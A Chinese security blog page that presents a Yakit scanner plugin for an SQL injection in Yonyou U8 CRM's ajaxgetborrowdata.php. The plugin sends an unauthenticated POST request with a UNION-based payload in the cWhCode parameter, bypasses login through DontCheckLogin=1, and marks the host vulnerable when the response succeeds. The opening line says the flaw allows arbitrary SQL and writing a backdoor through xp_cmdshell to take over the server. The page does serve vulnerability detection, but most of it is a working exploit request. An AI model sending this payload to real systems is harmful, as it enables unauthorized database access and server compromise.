用友U8 CRM ajaxgetborrowdata SQL注入

任意SQL语句，调用xp_cmdshell写入后门文件，执行任意代码，从而获取到服务器权限。

yakit.AutoInitYakit()

handleCheck = func(target,port){
    addr = str.HostPort(target, port)
    isTls = str.IsTLSServer(addr)

    packet1 = `POST /borrowout/ajaxgetborrowdata.php?DontCheckLogin=1&Action=getWarehouseOtherInfo HTTP/1.1
Host: {{params(target)}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=bgsesstimeout-;
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Connection: close

cWhCode=1%27+UNION+ALL+SELECT+CHAR%28113%29%2BCHAR%28113%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2899%29%2BCHAR%28105%29%2BCHAR%28114%29%2BCHAR%2887%29%2BCHAR%28120%29%2BCHAR%2874%29%2BCHAR%2866%29%2BCHAR%28106%29%2BCHAR%2885%29%2BCHAR%2898%29%2BCHAR%2886%29%2BCHAR%2874%29%2BCHAR%2875%29%2BCHAR%2868%29%2BCHAR%28108%29%2BCHAR%2899%29%2BCHAR%28114%29%2BCHAR%2890%29%2BCHAR%2867%29%2BCHAR%2874%29%2BCHAR%28114%29%2BCHAR%2873%29%2BCHAR%2876%29%2BCHAR%2877%29%2BCHAR%28101%29%2BCHAR%2870%29%2BCHAR%28122%29%2BCHAR%2888%29%2BCHAR%2886%29%2BCHAR%28103%29%2BCHAR%2881%29%2BCHAR%2899%29%2BCHAR%28107%29%2BCHAR%2865%29%2BCHAR%2868%29%2BCHAR%2867%29%2BCHAR%2885%29%2BCHAR%2876%29%2BCHAR%2879%29%2BCHAR%28122%29%2BCHAR%28113%29%2BCHAR%28120%29%2BCHAR%28122%29%2BCHAR%2898%29%2BCHAR%28113%29--+KRVC`

    rsp,req,_ = poc.HTTP(packet1,
    poc.params({"target":addr}),
    poc.https(isTls),
    poc.redirectTimes(0),
    )
    if str.MatchAllOfSubString(rsp, `HTTP/1.1 200`) && str.MatchAllOfSubString(rsp, `"success": true`) {
        yakit.Info("%v found 用友U8 CRM ajaxgetborrowdata.php SQL注入漏洞", addr)
        risk.NewRisk(
        addr,
        risk.title("用友U8 CRM ajaxgetborrowdata.php SQL注入漏洞"),
        risk.severity("high"),
        risk.titleVerbose("用友U8 CRM ajaxgetborrowdata.php SQL注入漏洞"),
        risk.request(string(req)),
        risk.response(string(rsp)),
        risk.cve("no cve"),
        risk.details("发现用友U8 CRM ajaxgetborrowdata.php 存在SQL注入漏洞，漏洞点为 cWhCode 参数，**通过响应状态码 200 和响应内容存在 `{\"success\": true}` 判断漏洞存在**。攻击者可以利用此漏洞执行任意SQL语句，获取数据库敏感信息。\n\n**漏洞复现请求:**\n```\n" + string(req) + "\n```\n\n**漏洞复现响应:**\n```\n" + string(rsp) + "\n```"),
    )
    }
    return
}

handle = func(result /* *fp.MatchResult */) {
    // handle match result
    if !result.IsOpen(){
        return
    }

    if len(result.Fingerprint.HttpFlows)>0{
        handleCheck(result.Target,result.Port)
    }

}

菜单

分享

用友U8 CRM ajaxgetborrowdata SQL注入

评论

JetBrains激活

Nessus Docker 部署

Office Tool Plus

NPS服务部署

SSRF漏洞测试

HTTP 严格传输安全（HSTS）

第三方图片验证码登录暴力破解

FRP服务部署

NPS测试

域前置